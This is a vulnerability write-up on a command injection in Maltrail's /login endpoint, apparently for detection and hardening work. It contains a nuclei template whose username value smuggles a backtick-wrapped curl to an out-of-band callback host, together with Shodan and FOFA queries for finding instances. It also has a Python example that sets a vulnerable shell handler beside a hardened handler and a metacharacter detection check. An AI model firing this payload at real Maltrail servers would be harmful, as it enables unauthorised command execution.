Vulnerability description
Maltrail versions <=0.54 are affected. A remote, unauthenticated attacker can execute arbitrary operating system commands by supplying a crafted username parameter in a POST request to the /login endpoint (OS command injection). The nuclei template below probes for it with an out-of-band callback: the username value carries a backtick-wrapped curl to an interactsh host, and a DNS or HTTP hit on that host confirms command execution.
id: CVE-2025-34073

info:
  name: Maltrail <=0.54 Username Parameter - Remote Command Execution
  author: SeungAh-Hong
  severity: critical
  description: |
    Maltrail versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
  reference:
    - https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87
    - https://vulncheck.com/advisories/stamparm-maltrail-rce
    - https://github.com/stamparm/maltrail/issues/19146
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/maltrail_rce.rb
  metadata:
    max-request: 1
    shodan-query: http.title:"Maltrail"
    fofa-query: app="Maltrail"
  tags: cve,cve2025,maltrail,rce,unauth,oss

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=;`curl http://{{interactsh-url}}`

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Maltrail")'
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
        condition: and
# digest: 4b0a00483046022100b6cb29e1be26b66ef70b5fe49d9d0f66de28b03f334d700f770936c37794fbc90221008118e7b969383762eab736c41540f15bdd9e2f0627dede0ba5d6ed0bed34e851:922c64590222798bb761d5b6d8e72950
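The following Python example is added here for illustration; it is not Maltrail's own code and is not part of the nuclei template above. It reconstructs the bug class the template probes for (a login handler that interpolates the username into a shell command), places it next to a hardened handler that passes the username as an argv element and validates it against an allow-list, and adds a request-body check that a WAF rule or log-based detection could apply. The function names and the echo-based "logging" command are assumptions; the backtick payload mirrors the template's, with `echo INJECTED` standing in for the curl callback so the example runs offline.

```python
# Added example, not Maltrail's own code and not part of the nuclei template.
# It reconstructs the bug class the template probes for (a login handler that
# interpolates the username into a shell command), a hardened handler, and a
# request-body check. Function names and the echo-based "logging" command are
# assumptions made for illustration.
import re
import subprocess
from urllib.parse import unquote_plus

# Mirrors the template payload: backticks are command-substituted by sh even
# inside double quotes, which is why the probe uses `curl ...` and not just ';'.
PAYLOAD = ';`echo INJECTED`'

# Allow-list for usernames; anything outside it is rejected before use.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")
# Shell metacharacters that never belong in a login username.
SHELL_META_RE = re.compile(r"[;`$|&<>(){}\n\r]")


def log_login_vulnerable(username: str) -> str:
    """Vulnerable pattern: attacker-controlled text is pasted into a command
    string that /bin/sh then parses. Returns the command's stdout."""
    cmd = 'echo "failed login for %s"' % username
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def log_login_safe(username: str) -> str:
    """Hardened pattern: same intent, but the username travels as a single argv
    element with shell=False, so no shell ever interprets it."""
    proc = subprocess.run(["echo", "failed login for %s" % username],
                          capture_output=True, text=True)
    return proc.stdout


def parse_form(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded parser; decodes %XX and '+'
    so an encoded payload (%3B%60...) is inspected in its decoded form."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def is_injection_attempt(body: str) -> bool:
    """Detection check for a POST /login body: flag shell metacharacters in the
    decoded username. Usable in a WAF rule or a log-based detection."""
    username = parse_form(body).get("username", "")
    return SHELL_META_RE.search(username) is not None


def handle_login(body: str) -> str:
    """Hardened handler: validate against the allow-list first, then log via the
    argv-based helper. Returns an HTTP-style status line for the caller."""
    username = parse_form(body).get("username", "")
    if not USERNAME_RE.fullmatch(username):
        return "400 Bad Request: username rejected"
    log_login_safe(username)
    return "401 Unauthorized"


if __name__ == "__main__":
    print("vulnerable:", repr(log_login_vulnerable(PAYLOAD)))
    print("hardened:  ", repr(log_login_safe(PAYLOAD)))
    print("flagged:", is_injection_attempt("username=%3B%60curl+http%3A%2F%2Fx%60"))
    print("handler:", handle_login("username=" + PAYLOAD))
```

Running the vulnerable handler with the payload yields `failed login for ;INJECTED`, showing that the substitution ran inside the double-quoted string; the argv-based handler prints the backticks back literally. The detection function decodes the body before matching, because a real probe may arrive URL-encoded (`%3B%60`), and `parse_form` avoids `urllib.parse.parse_qs` on purpose: older Python versions also treat `;` as a pair separator and would silently swallow the very character the check is looking for.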